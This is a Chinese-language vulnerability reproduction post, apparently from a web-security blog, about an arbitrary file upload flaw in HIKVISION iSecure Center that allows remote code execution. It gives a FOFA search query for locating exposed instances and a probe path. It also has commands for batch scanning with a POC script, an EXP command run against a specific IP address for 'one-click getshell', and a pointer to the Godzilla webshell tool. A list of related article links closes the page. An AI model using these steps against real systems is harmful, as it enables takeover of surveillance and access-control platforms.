海康威视综合安防管理平台任意文件上传

系统介绍

HIKVISION iSecure Center综合安防管理平台是一套"集成化"、"智能化"的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,公众号:web安全工具库,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于"统一软件技术架构"先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。

影响范围

iSecure Center(V1.0.0 - V1.7.0 )

复现环境

FOFA:app="HIKVISION-iSecure-Center"

漏洞复现

ip:port/center/api/files;.js

若出现此页面,则可能存在漏洞

工具快速复现

poc采用无害化扫描检测,无文件残留,可批量检测;exp只做单个url攻击,一键shell

GitHub - xwna/HIKVISION_iSecure_Center-RCE: HIKVISION iSecure Center RCE 海康威视综合安防管理平台任意文件上传 POC&EXP(一键getshell)

POC:

python3 iSecure-Center-RCE_POC.py -f URL.txt

EXP:

python3 iSecure-Center-RCE_EXP.py -u https://182.19.10.99

通过哥斯拉工具连接

下载

GitHub - BeichenDream/Godzilla: 哥斯拉

还可以通过手工修改数据包方式上传。

相关推荐
漏洞文库-Web安全18 分钟前
CTFHUB技能树-SSRF【持续更新】
安全·web安全·网络安全·ctf·post·ssrf·ctfhub
Dest1ny-安全25 分钟前
CTF入门:国内线上CTF比赛时间及部分题目资源
网络·安全·web安全·微信小程序·php
周某人姓周1 小时前
XSS(一)概述
前端·安全·xss
盟接之桥1 小时前
盟接之桥说制造:做新时代的“点火者”——从《星星之火,可以燎原》看制造者的信念与方法(供批评)
大数据·前端·人工智能·安全·制造
WHFENGHE1 小时前
输电线路微气象在线监测装置——电力安全的实时守护者
网络·安全
tianyuanwo1 小时前
SSH连接底层原理与故障深度解析:从协议握手到安全运维
运维·安全·ssh
国服第二切图仔1 小时前
智能电眼:Rokid AR眼镜重塑电力巡检安全防线
安全·ar·智能眼镜·rokid
上海云盾-小余1 小时前
警惕 “伪装型” CC 攻击!通过日志分析识别异常请求,让恶意访问无所遁形
人工智能·安全·架构
R***z1011 小时前
【Sql Server】sql server 2019设置远程访问,外网服务器需要设置好安全组入方向规则
运维·服务器·安全
网安小白的进阶之路1 小时前
B模块 安全通信网络 第一门课 园区网实现与安全-3-项目实战
网络·安全